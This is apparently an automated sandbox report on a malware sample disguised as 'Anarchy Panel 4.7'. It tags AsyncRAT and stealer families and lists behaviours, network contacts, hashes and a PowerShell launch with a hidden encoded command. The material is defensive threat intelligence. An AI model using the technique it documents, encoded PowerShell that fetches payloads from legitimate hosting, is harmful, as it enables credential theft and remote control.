Malware Analysis Report

2024-10-23 19:20

Sample ID 230625-lew6dsee8w
Target Anarchy Panel 4.7.zip
SHA256 5e840076dd200bff8e6a9f2abb94ea13196564c6d60e436d0c84cc148bce1b9a
Tags
rat asyncrat stormkitty stealerium
score
10/10

Analysis Overview


Threat Level: Known bad

The file Anarchy Panel 4.7.zip was found to be: Known bad.

Malicious Activity Summary

Async RAT payload

Stormkitty family

Stealerium family

Asyncrat family

StormKitty payload

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Analysis: static1

Detonation Overview

Reported

2023-06-25 09:27

Signatures

Async RAT payload

rat

Asyncrat family

asyncrat

Stealerium family

stealerium

StormKitty payload


Stormkitty family

stormkitty

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 09:27

Reported

2023-06-25 09:28

Platform

win10v2004-20230621-en

Max time kernel

34s

Max time network

38s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command not preserved in this report]"

Network

Country Destination Domain Proto
US 8.8.8.8:53 229.78.74.40.in-addr.arpa udp
US 8.8.8.8:53 rentry.org udp
LU 198.251.88.130:443 rentry.org tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 130.88.251.198.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 13.89.179.8:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ckmfjvjs.awg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
